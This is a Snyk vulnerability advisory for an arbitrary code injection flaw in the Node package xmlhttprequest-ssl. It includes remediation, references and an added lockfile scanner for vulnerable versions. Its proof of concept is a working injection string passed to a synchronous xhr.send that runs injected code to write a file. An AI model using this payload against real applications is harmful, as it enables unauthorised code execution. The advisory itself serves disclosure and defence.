SNYK-JS-XMLHTTPREQUESTSSL-1082936
## Overview

[xmlhttprequest-ssl](https://github.com/mjwwit/node-XMLHttpRequest) is a fork of `xmlhttprequest`.

Affected versions of this package are vulnerable to Arbitrary Code Injection. When requests are sent synchronously (`async=false` on `xhr.open`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run.

### POC

```
const { XMLHttpRequest } = require("xmlhttprequest")

const xhr = new XMLHttpRequest()
xhr.open("POST", "http://localhost.invalid/", false /* use a synchronous request */)
xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//")
```

## Remediation

Upgrade `xmlhttprequest-ssl` to version 1.6.2 or higher.

## References

- [GitHub Commit #1](https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6)
- [GitHub Commit #2](https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291)
- [Vulnerable Code](https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480)
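
To check a project against the remediation above, the following added example (not part of the advisory or of the package's own code) scans a parsed `package-lock.json` for installed copies of `xmlhttprequest-ssl` below 1.6.2, including copies nested under other dependencies. The lockfile contents and the `example-client` package name are constructed for illustration, and the version comparison ignores pre-release suffixes.

```javascript
const PACKAGE = "xmlhttprequest-ssl"; // package named in the advisory
const FIXED = "1.6.2";                // first fixed version per the advisory

// Compare x.y.z versions numerically; pre-release/build suffixes are ignored.
function compareVersions(a, b) {
  const parse = (v) => v.split(/[-+]/)[0].split(".").map(Number);
  const pa = parse(a), pb = parse(b);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Return every installed copy of PACKAGE below FIXED in a parsed package-lock.json.
function findVulnerableInstalls(lock) {
  const hits = new Map(); // install path -> version, de-duplicated
  const check = (path, version) => {
    if (typeof version === "string" && compareVersions(version, FIXED) < 0) hits.set(path, version);
  };
  // lockfileVersion 2 and 3: flat "packages" map keyed by install path
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path.endsWith("node_modules/" + PACKAGE)) check(path, meta.version);
  }
  // lockfileVersion 1 (and the legacy copy kept in version 2): nested "dependencies" tree
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = prefix + "node_modules/" + name;
      if (name === PACKAGE) check(path, meta.version);
      walk(meta.dependencies, path + "/");
    }
  };
  walk(lock.dependencies, "");
  return [...hits].map(([path, version]) => ({ path, version }));
}

// Constructed sample lockfile: one patched top-level copy, one outdated nested copy.
const sampleLock = {
  lockfileVersion: 2,
  packages: {
    "node_modules/xmlhttprequest-ssl": { version: "1.6.3" },
    "node_modules/example-client/node_modules/xmlhttprequest-ssl": { version: "1.5.5" },
  },
  dependencies: {
    "xmlhttprequest-ssl": { version: "1.6.3" },
    "example-client": { version: "2.0.0", dependencies: { "xmlhttprequest-ssl": { version: "1.5.5" } } },
  },
};

console.log(findVulnerableInstalls(sampleLock));
```

In a real project, pass `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))` instead of `sampleLock`.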
Timeline
- Mar 5, 2021 CVE Updated
- Mar 5, 2021 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936 advisory
- https://learn.snyk.io/lesson/malicious-code-injection/ technical
- https://github.com/mjwwit/node-XMLHttpRequest technical
- https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6 patch
- https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291 patch
- https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480 technical